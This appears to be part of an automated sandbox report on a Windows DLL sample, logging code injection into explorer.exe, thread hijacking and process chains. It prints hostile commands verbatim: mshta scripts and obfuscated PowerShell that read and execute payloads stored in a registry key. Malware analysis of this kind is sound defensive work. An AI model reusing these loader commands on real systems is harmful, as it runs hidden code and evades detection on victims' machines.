            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: D70000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Changes memory attributes in foreign processes to executable or writable
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC8DCB1580 protect: page execute read
            Allocates memory in foreign processes
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2BA0000 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 956000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 2D60000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 954000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 2B60000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 940000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 2B50000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 942000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3352 base: 2AC0000 value: 80
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 93E000 value: 00
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 2BA0000 value: 80
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 93C000 value: 00
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: EB
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: D70000 value: 80
            Source: C:\Windows\System32\control.exeMemory written: PID: 3352 base: 7FFC8DCB1580 value: 40
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 3360Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 3088Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\control.exeThread register set: target process: 3352
            Source: C:\Windows\System32\control.exeThread register set: target process: 3352
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 8DCB1580
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000002F.00000000.471103608.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.479070191.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.518388066.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 0000002F.00000000.479497547.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000002F.00000000.492712624.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496673793.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
